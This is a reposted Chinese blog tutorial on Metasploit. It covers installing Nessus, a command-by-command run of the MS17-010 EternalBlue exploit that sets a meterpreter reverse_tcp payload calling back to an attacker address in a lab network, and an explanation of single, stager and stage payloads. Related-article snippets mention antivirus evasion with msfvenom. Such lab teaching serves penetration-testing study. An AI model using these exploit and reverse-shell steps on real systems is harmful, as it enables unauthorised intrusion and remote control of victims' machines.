5.Metasploit攻击载荷深入理解

最新推荐文章于 2024-05-05 12:37:13 发布
最新推荐文章于 2024-05-05 12:37:13 发布
阅读量893 收藏 10
点赞数 1
文章标签: 操作系统 php 数据库
原文链接:http://www.cnblogs.com/lvwuwa/p/11128964.html
版权

Metasploit 进阶第三讲

深入理解攻击载荷

 

01 Nesus介绍、安装及使用

 

Nessus介绍

Nessus是一款著名的漏洞扫描及分析工具,提供完整的漏洞扫描服务,并随时更新漏洞数据库。

采用B/S模式,服务器端负责执行具体的扫描任务,客户端负责管理配置服务器端,在服务器端还采用plug-in体系,支持客户端加入自定义插件,其运作效能随系统资源而自行调整。

 

Nessus安装&使用

 

1.https://www.tenable.com/downloads/nessus              ->Nessus下载、获取激活码

2.dpkg  -I  Nessus-8.3.1-debian6_amd64/i386.deb             ->Nessus安装

3./etc/init.d/nessusd start             ->Nessus服务器端启动

Register for an Activation Co

4.https://127.0.0.1:8834/                 ->客户端访问(添加例外)获取激活码:

https://www.tenable.com/products/nessus-home

 

 

 

实操:利用ms2017-010攻击目标主机

 

ms17-010漏洞出现在Windows SMBv1中的内核态函数srv4SrvOs2FeaListToNt。

在将FEA list转换成NTFEA(Windows NT FEA)list前会调用srv.SrvOs2FeaListSizeToNt去计算转换后的FEAlist的大小,因计算大小错误,而导致缓冲区溢出。

 

Msfconsole

Search  ms17-010

use exploit/windows/smb/ms17_010_eternalblue

set        rhosts   192.168.24.142

show    payloads

set        payload  windows/x64/meterpreter/reverse_tcp

set  lhost  192.168.24.137

run

 

 

深入理解payload

 

payload是什么?

 

payload字面意思是有效攻击载荷,包含需要在远程主机上运行的恶意代码。

 

payload和exploit的区别?

 

 

exploit是传送系统(运载火箭),payload是用来实际做什么事的代码(弹头)

 

 

payload命名规则:

 

Staged payload:<platform>/[archl/stage>/<stager>

 

Single payload:<platform>/[arch]/ssingle>

 

其中arch可选,因为不必要或已默认,如:php/meterpreter/reverse_tcp

 

 

payload的分类:

 

single、stager、stage三种。其中:

 

single:是一种完全独立的Payload。如:meterpreter_reverse_tcp

 

 stager:负责建立目标用户与攻击者之间的网络连接,将执行传递到另一个阶段。

如:reverse_tcp、bind_tcp

 

作用:

1.允许我们使用较小的有效载荷去加载具有更多功能的较大的payload。

2.使通信机制与最终阶段分离成为可能。

 

stage:提供更高级的功能,且没有大小限制(因为stager为stage分配了大量内存)

如:meterpreter

 

stager和stage就像web入侵里面提到的小马和大马一样,由于exploit环境的限制,可能不能一下子把stage传过去,需要先传一个stager,stager在attacker和target之间建立网络连接,之后再把stage传过去进行下一步的行动。

 

 

 

转载于:https://www.cnblogs.com/lvwuwa/p/11128964.html

weixin_30279751
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit网络攻击样例解析.pptx
01-05
网络渗透攻击与普通网络攻击的不同在于它是一种系统渐进型的综合攻击方式,其攻击目标是明确的,攻击目的往往不那么单一,危害性也非常严重。为了实现渗透攻击攻击者采用的攻击方式绝不仅此于一种简单的Web脚本...
使用Metasploit生成攻击载荷——msfvenom免杀、upx加壳
渗透测试
06-06 6241
文章目录前言一、免杀1.msfvenom的使用2.多重编码二、加壳1.upx的使用总结 前言 本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件 一、免杀 免杀字面意思就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描 1.msfvenom的使用 ┌──(root????kali)-[~] └─# msfvenom info
理解攻击载荷
热门推荐
小山岷的专栏
01-10 1万+
攻击载荷(payload)是系统被攻陷后执行的操作。通常攻击载荷附加于漏洞攻击模块之上,随漏洞攻击一起分发。攻击载荷主分别为:singles stagers stagessinglesSingles are payloads that are self-contained and completely standalone. A Single payload can be some
metasploit学习之路(三) exploit+payload攻击载荷+metepreter(介绍)
Sea_Sand息禅
07-07 2195
一、exploit介绍 exploit是利用漏洞对目标进行攻击的模块,通过信息的手机及漏洞的验证等,使用相应的exploit对目标机进行漏洞攻击。也就是我么常说的漏洞利用exp。 exploit可有主动和被动两种。 主动:利用合适的exploit对目标机进行攻击 被动:类似于钓鱼,等待用户对我们的诱饵链接等进行操作我们才能攻击成功。 二、payload介绍 payload是msf生成的有效载荷,可...
载荷是什么意思?底层原理是什么?
长风破浪会有时的博客
04-05 1176
在网络安全领域中,载荷通常通过网络传输进行分发,例如在攻击中利用漏洞,将恶意代码注入到目标系统中,然后通过网络连接控制目标系统,完成攻击的目标。此外,攻击者还可以通过恶意附件、恶意链接等方式将载荷传递给用户,从而控制用户的计算机。在防范安全攻击时,通常需要对载荷进行分析和检测。在计算机安全领域中,载荷(Payload)是指利用漏洞或攻击手段所携带的恶意代码或指令,用来实现攻击者的目的的一段数据或程序代码。载荷通常被设计成可以在目标系统上执行的代码,其目的是为了控制受害者系统、窃取数据、破坏系统等。
基于MetaSploit的网络攻击研究(37页16263字数).doc
06-22
本文从网络安全现状入手,深入分析网络攻击的根源,对网络攻击原理进行深入、细致剖析,全面分类阐述网络攻击的主要手段与实现方法,对目前常见攻击手段和工具,做了细致的分析,给出了他们的特点和实施方法。...
metasploit 浏览器攻击
01-20
metasploit 浏览器攻击metasploit 浏览器攻击metasploit 浏览器攻击
metasploit-framework-6.3.34.zip
09-17
metasploit-framework-6.3.34.zip
metasploitframework-latest.msi
09-17
metasploitframework-latest.msi
获取Java 虚拟机进程ID(java应用进程Id的方法) Linux & windows
weixin_44131922的博客
04-30 417
这个命令会列出所有包含"java"的进程信息。从中你可以找到你的Java应用对应的进程行,第一列就是进程ID(PID)。这个命令会列出所有包含"java"的进程信息。在输出的信息中,你可以找到Java进程及其PID。替换为你的Java主类名或jar文件名的部分匹配字符串,pgrep会直接返回对应的进程ID。如果你需要在Java程序内部获取其自身的进程ID,可以使用。这段代码会打印出当前运行Java程序的进程ID。
电脑怎样才能每天定时自动打开指定文件?定时打开指定文件的方法
happy_prettygirl的博客
04-28 677
介绍了两种让电脑自动每天定时打开文件的方法:使用Windows任务计划程序和第三方软件汇帮定时精灵。通过任务计划程序,可以创建基本任务,设置触发器和操作,实现文件自动打开。而汇帮定时精灵则提供了更多选项和功能,满足更复杂需求。
【鸿蒙开发】第二十二章 Media Library媒体文件管理服务
Yvan
04-30 761
提供了,包括照片和视频,帮助你的应用快速构建图片视频展示和播放能力。通过Media Library Kit, 开发者可以管理相册和媒体文件,包括创建相册以及访问、修改相册中的媒体信息等,其中对三方应用开放的能力有:媒体资源(图片、视频)相关获取指定媒体资源获取图片和视频缩略图创建媒体资源(安全控件)重命名媒体资源用户相册相关获取用户相册重命名用户相册添加图片和视频到用户相册中获取用户相册中的图片和视频从用户相册中移除图片和视频系统相册相关视频相册。
Virtualbox7.0.10--创建虚拟机
醉殇姒若梦遗年 ツ的博客
04-29 406
6.完成后的界面,至此虚拟机新建完成。左侧是我们新建的虚拟电脑,右侧是它的一些配置项,右侧上方,我们可以点击【注册】进行导入一个操作系统的镜像,【启动】可以直接启动虚拟电脑。虚拟电脑名称为Ubuntu20.04,文件夹存放在D盘,虚拟光盘可以暂时不选,系统类型设置为Linux,版本设置为Ubuntu(64-bit),设置好以后单击“4.内存配置好后,就需要配置下硬盘了,主要是硬盘的容量,默认是25G,可以不改,直接。5.最后,再确认一下整体的配置,如果没有问题,可以直接点击“”,进入新建虚拟电脑页面。
【12575嵌入式系统】嵌入式系统考前复习题终结版期末复习自考复习
最新发布
嵌入式行业打工人,不定期更新博客。
05-05 492
答:1)小端存储器组织是较高的有效字节存放在较高的存储器地址,较低的有效。嵌入式系统是以应用为中心,以计算机技术为基础,软件硬件可裁剪,适应应用系。答:寻址方式是根据指令中给出的地址码字段来实现寻找真实操作数地址的方式。器产生一个具有一定时间宽度的复位信号,迫使系统复位,恢复系统正常运行。答:通用操作系统是一种通用的操作系统,可运行在不同的。答:当系统程序出现功能错乱,引起系统程序死循环时,能。存放在较低的存储器地址,较低的有效字节存放在较高的。正常运行,恢复系统程序的正常运行。
Docker的介绍及与传统虚拟化技术的区别
IT深耕十余载,大道之简
05-01 597
Docker是一个开源的应用容器引擎,它使得开发者可以将应用及其依赖包打包到一个可移植的容器中,然后发布到任何流行的Linux或Windows操作系统的机器上。Docker基于Go语言开发,它的出现极大地简化了应用程序的部署、管理和扩展。
Linux软件安装
qq_65463941的博客
05-02 642
在Linux中编译安装软件通常需要执行以下几个步骤:下载源代码包可以从软件的官网、github等网下载解压源代码包进入软件包源代码目录在解压后得到的目录中,通常会有一个README文件、INSTALL、SETUP文件,其中描述了如何编译和安装软件执行configure脚本大多数软件包都包含了一个configure脚本,用于检测系统环境,并生成Makefile文件,Makefile文件包含了编译和安装软件所需的所有信息,执行./configure命令即可执行make命令。
桌面运维岗面试三十问
一坨小橙子的博客
04-28 802
桌面运维岗面试问题及答案汇总
ssh-Y使用图形化界面
heyuye110
04-28 226
ssh UI 图形化界面
5. Metasploit-Framework使用模块攻击目标时如何设置目标端口(1.5分) A. set lport 192.168.8.1 B.set lhosts 192.168.8.1 C. set rport 192.168.8.1D.set rhosts 192.168.8.1
06-13
Metasploit-Framework 中,使用模块攻击目标时可以通过 set rport 命令设置目标端口。其中 rport 表示 remote port,即目标主机的端口号。在设置目标端口前,需要先设置目标主机的 IP 地址,即使用 set rhosts ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值